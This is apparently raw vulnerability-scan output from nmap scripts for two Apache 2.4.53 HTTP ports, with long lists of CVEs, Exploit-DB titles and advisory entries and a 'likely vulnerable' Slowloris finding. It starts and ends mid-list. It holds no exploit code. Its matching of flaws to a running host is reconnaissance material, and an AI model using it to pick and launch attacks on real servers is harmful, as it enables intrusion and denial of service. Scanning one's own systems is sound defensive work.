Memory Information Disclosure [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62617] nginx Internal DNS Cache Poisoning Weakness [61779] nginx HTTP Request Escape Sequence Terminal Command Injection [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write [58128] nginx ngx_http_parse_complex_uri() Function Underflow [44447] nginx (engine x) msie_refresh Directive Unspecified XSS [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal [44443] nginx (engine x) rtsig Method Signal Queue Overflow [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
8000	tcp	open	http	syn-ack	Apache httpd	2.4.53
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-server-header	Apache/2.4.53 (Debian)
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-dombased-xss	Couldn't find any DOM based XSS.
	vulners	cpe:/a:apache:http_server:2.4.53: CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 CVE-2022-30522 5.0 https://vulners.com/cve/CVE-2022-30522 CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
	vulscan	VulDB - https://vuldb.com: [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy weak authentication [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache denial of service [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service [176770] Apache HTTP Server up to 2.4.46 on Windows denial of service [176769] Apache HTTP Server up to 2.4.46 MergeSlashes unknown vulnerability [176768] Apache HTTP Server up to 2.4.46 mod_session heap-based overflow [176767] Apache HTTP Server up to 2.4.46 mod_session null pointer dereference [176766] Apache HTTP Server up to 2.4.46 mod_proxy_http null pointer dereference [176765] Apache HTTP Server up to 2.4.46 mod_proxy_wstunnel improper authentication [176764] Apache HTTP Server up to 2.4.46 mod_auth_digest stack-based overflow [159399] Apache HTTP Server up to 2.4.43 HTTP2 Request privilege escalation [159376] Apache HTTP Server up to 2.4.43 mod_http2 privilege escalation [159375] Apache HTTP Server 2.4.24 mod_remoteip/mod_rewrite IP Address weak authentication [159374] Apache HTTP Server up to 2.4.44 mod_proxy_uwsgi memory corruption [152665] Apache HTTP Server up to 2.4.41 mod_proxy_ftp Uninitialized Resource [152664] Apache HTTP Server up to 2.4.41 mod_rewrite Redirect [142325] Apache HTTP Server up to 2.4.39 mod_remoteip denial of service [142324] Apache HTTP Server up to 2.4.39 mod_proxy cross site scripting [142323] Apache HTTP Server up to 2.4.39 HTTP2 Session memory corruption [142187] Apache HTTP Server up to 2.4.39 mod_rewrite Redirect [136374] Apache HTTP Server up to 2.4.38 Slash denial of service [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 privilege escalation [136372] Apache HTTP Server up to 2.4.38 HTTP2 memory corruption [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl privilege escalation [130341] Apache HTTP Server 2.4.37 mod_ssl privilege escalation [130330] Apache HTTP Server up to 2.4.37 mod_session Expired weak authentication [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service [121910] Apache HTTP Server 2.4.33 mod_md denial of service [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge weak authentication [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache information disclosure [115059] Apache HTTP Server up to 2.4.29 HTTP2 denial of service [115058] Apache HTTP Server up to 2.4.29 memory corruption [115057] Apache HTTP Server up to 2.4.29 mod_session privilege escalation [115039] Apache HTTP Server up to 2.4.29 FilesMatch privilege escalation [114258] Apache HTTP Server up to 2.4.22 mod_cluster privilege escalation [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest privilege escalation [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption [94625] Apache HTTP Server up to 2.4.24 Response Split Data Processing Error [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c privilege escalation [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict privilege escalation [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service [88667] Apache HTTP Server up to 2.4.20 mod_http2 privilege escalation [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required privilege escalation [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 denial of service [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade privilege escalation [73106] Apache Hadoop up to 2.4.0 privilege escalation [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 privilege escalation [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers memory corruption [67185] Apache HTTP Server up to 2.4.9 mod_status race condition [67183] Apache HTTP Server up to 2.4.9 mod_proxy privilege escalation [67182] Apache HTTP Server up to 2.4.9 mod_deflate denial of service [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service [67180] Apache HTTP Server up to 2.4.9 WinNT MPM denial of service [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi information disclosure [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie privilege escalation [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c privilege escalation [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path privilege escalation [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure MITRE CVE - https://cve.mitre.org: [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors. [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies. [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string. [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client. [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules. [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body. [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list. [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors. [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl. [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow. SecurityFocus - https://www.securityfocus.com/bid/: [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability [15177] PHP Apache 2 Local Denial of Service Vulnerability [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability [5816] Apache 2 mod_dav Denial Of Service Vulnerability [5486] Apache 2.0 CGI Path Disclosure Vulnerability [5485] Apache 2.0 Path Disclosure Vulnerability [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [75211] Debian GNU/Linux apache 2 cross-site scripting Exploit-DB - https://www.exploit-db.com: [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability [27915] Apache James 2.2 SMTP Denial of Service Vulnerability [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2) [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1) [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability [21719] Apache 2.0 Path Disclosure Vulnerability [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities [17691] Apache Struts < 2.2.0 - Remote Command Execution [15319] Apache 2.2 (Windows) Local Denial of Service [14617] Apache JackRabbit 2.0.0 webapp XPath Injection [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32) [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit [9] Apache HTTP Server 2.x Memory Leak Exploit OpenVAS (Nessus) - http://www.openvas.org: [855524] Solaris Update for Apache 2 120544-14 [855077] Solaris Update for Apache 2 120543-14 [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [72626] Debian Security Advisory DSA 2579-1 (apache2) [71551] Gentoo Security Advisory GLSA 201206-25 (apache) [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat) [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security) [71256] Debian Security Advisory DSA 2452-1 (apache2) [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid) [70724] Debian Security Advisory DSA 2405-1 (apache2) [70235] Debian Security Advisory DSA 2298-2 (apache2) [70233] Debian Security Advisory DSA 2298-1 (apache2) [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external) [69338] Debian Security Advisory DSA 2202-1 (apache2) [65131] SLES9: Security update for Apache 2 oes/CORE [64426] Gentoo Security Advisory GLSA 200907-04 (apache) [61381] Gentoo Security Advisory GLSA 200807-06 (apache) [60582] Gentoo Security Advisory GLSA 200803-19 (apache) [58745] Gentoo Security Advisory GLSA 200711-06 (apache) [57851] Gentoo Security Advisory GLSA 200608-01 (apache) [56246] Gentoo Security Advisory GLSA 200602-03 (Apache) [55392] Gentoo Security Advisory GLSA 200509-12 (Apache) [55129] Gentoo Security Advisory GLSA 200508-15 (apache) [54739] Gentoo Security Advisory GLSA 200411-18 (apache) [54724] Gentoo Security Advisory GLSA 200411-03 (apache) [54712] Gentoo Security Advisory GLSA 200410-21 (apache) [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache) [54677] Gentoo Security Advisory GLSA 200409-21 (apache) [54610] Gentoo Security Advisory GLSA 200407-03 (Apache) [54601] Gentoo Security Advisory GLSA 200406-16 (Apache) [54590] Gentoo Security Advisory GLSA 200406-05 (Apache) [54582] Gentoo Security Advisory GLSA 200405-22 (Apache) [54529] Gentoo Security Advisory GLSA 200403-04 (Apache) [54499] Gentoo Security Advisory GLSA 200310-04 (Apache) [54498] Gentoo Security Advisory GLSA 200310-03 (Apache) [11092] Apache 2.0.39 Win32 directory traversal [66081] SLES11: Security update for Apache 2 [66074] SLES10: Security update for Apache 2 [66070] SLES9: Security update for Apache 2 [65893] SLES10: Security update for Apache 2 [65888] SLES10: Security update for Apache 2 [65510] SLES9: Security update for Apache 2 [65249] SLES9: Security update for Apache 2 [65230] SLES9: Security update for Apache 2 [65228] SLES9: Security update for Apache 2 [65207] SLES9: Security update for Apache 2 [65136] SLES9: Security update for Apache 2 [65017] SLES9: Security update for Apache 2 SecurityTracker - https://www.securitytracker.com: [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users OSVDB - http://www.osvdb.org: [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
10000	tcp	open	http	syn-ack	Apache httpd	2.4.53
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-slowloris-check	VULNERABLE: Slowloris DOS attack State: LIKELY VULNERABLE IDs: CVE:CVE-2007-6750 Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. By doing so, it starves the http server's resources causing Denial Of Service. Disclosure date: 2009-09-17 References: http://ha.ckers.org/slowloris/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
	vulners	cpe:/a:apache:http_server:2.4.53: CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 CVE-2022-30522 5.0 https://vulners.com/cve/CVE-2022-30522 CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
	http-server-header	Apache/2.4.53 (Debian)
	vulscan	VulDB - https://vuldb.com: [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy weak authentication [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache denial of service [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service [176770] Apache HTTP Server up to 2.4.46 on Windows denial of service [176769] Apache HTTP Server up to 2.4.46 MergeSlashes unknown vulnerability [176768] Apache HTTP Server up to 2.4.46 mod_session heap-based overflow [176767] Apache HTTP Server up to 2.4.46 mod_session null pointer dereference [176766] Apache HTTP Server up to 2.4.46 mod_proxy_http null pointer dereference [176765] Apache HTTP Server up to 2.4.46 mod_proxy_wstunnel improper authentication [176764] Apache HTTP Server up to 2.4.46 mod_auth_digest stack-based overflow [159399] Apache HTTP Server up to 2.4.43 HTTP2 Request privilege escalation [159376] Apache HTTP Server up to 2.4.43 mod_http2 privilege escalation [159375] Apache HTTP Server 2.4.24 mod_remoteip/mod_rewrite IP Address weak authentication [159374] Apache HTTP Server up to 2.4.44 mod_proxy_uwsgi memory corruption [152665] Apache HTTP Server up to 2.4.41 mod_proxy_ftp Uninitialized Resource [152664] Apache HTTP Server up to 2.4.41 mod_rewrite Redirect [142325] Apache HTTP Server up to 2.4.39 mod_remoteip denial of service [142324] Apache HTTP Server up to 2.4.39 mod_proxy cross site scripting [142323] Apache HTTP Server up to 2.4.39 HTTP2 Session memory corruption [142187] Apache HTTP Server up to 2.4.39 mod_rewrite Redirect [136374] Apache HTTP Server up to 2.4.38 Slash denial of service [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 privilege escalation [136372] Apache HTTP Server up to 2.4.38 HTTP2 memory corruption [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl privilege escalation [130341] Apache HTTP Server 2.4.37 mod_ssl privilege escalation [130330] Apache HTTP Server up to 2.4.37 mod_session Expired weak authentication [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service [121910] Apache HTTP Server 2.4.33 mod_md denial of service [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge weak authentication [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache information disclosure [115059] Apache HTTP Server up to 2.4.29 HTTP2 denial of service [115058] Apache HTTP Server up to 2.4.29 memory corruption [115057] Apache HTTP Server up to 2.4.29 mod_session privilege escalation [115039] Apache HTTP Server up to 2.4.29 FilesMatch privilege escalation [114258] Apache HTTP Server up to 2.4.22 mod_cluster privilege escalation [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest privilege escalation [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption [94625] Apache HTTP Server up to 2.4.24 Response Split Data Processing Error [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c privilege escalation [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict privilege escalation [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service [88667] Apache HTTP Server up to 2.4.20 mod_http2 privilege escalation [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required privilege escalation [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 denial of service [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade privilege escalation [73106] Apache Hadoop up to 2.4.0 privilege escalation [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 privilege escalation [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers memory corruption [67185] Apache HTTP Server up to 2.4.9 mod_status race condition [67183] Apache HTTP Server up to 2.4.9 mod_proxy privilege escalation [67182] Apache HTTP Server up to 2.4.9 mod_deflate denial of service [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service [67180] Apache HTTP Server up to 2.4.9 WinNT MPM denial of service [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi information disclosure [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie privilege escalation [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c privilege escalation [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path privilege escalation [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure MITRE CVE - https://cve.mitre.org: [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors. [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies. [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string. [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client. [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules. [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body. [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list. [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors. [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl. [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow. SecurityFocus - https://www.securityfocus.com/bid/: [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability [15177] PHP Apache 2 Local Denial of Service Vulnerability [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability [5816] Apache 2 mod_dav Denial Of Service Vulnerability [5486] Apache 2.0 CGI Path Disclosure Vulnerability [5485] Apache 2.0 Path Disclosure Vulnerability [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [75211] Debian GNU/Linux apache 2 cross-site scripting Exploit-DB - https://www.exploit-db.com: [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability [27915] Apache James 2.2 SMTP Denial of Service Vulnerability [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2) [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1) [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability [21719] Apache 2.0 Path Disclosure Vulnerability [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities [17691] Apache Struts < 2.2.0 - Remote Command Execution [15319] Apache 2.2 (Windows) Local Denial of Service [14617] Apache JackRabbit 2.0.0 webapp XPath Injection [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32) [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit [9] Apache HTTP Server 2.x Memory Leak Exploit OpenVAS (Nessus) - http://www.openvas.org: [855524] Solaris Update for Apache 2 120544-14 [855077] Solaris Update for Apache 2 120543-14 [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [72626] Debian Security Advisory DSA 2579-1 (apache2) [71551] Gentoo Security Advisory GLSA 201206-25 (apache) [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat) [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security) [71256] Debian Security Advisory DSA 2452-1 (apache2) [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid) [70724] Debian Security Advisory DSA 2405-1 (apache2) [70235] Debian Security Advisory DSA 2298-2 (apache2) [70233] Debian Security Advisory DSA 2298-1 (apache2) [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external) [69338] Debian Security Advisory DSA 2202-1 (apache2) [65131] SLES9: Security update 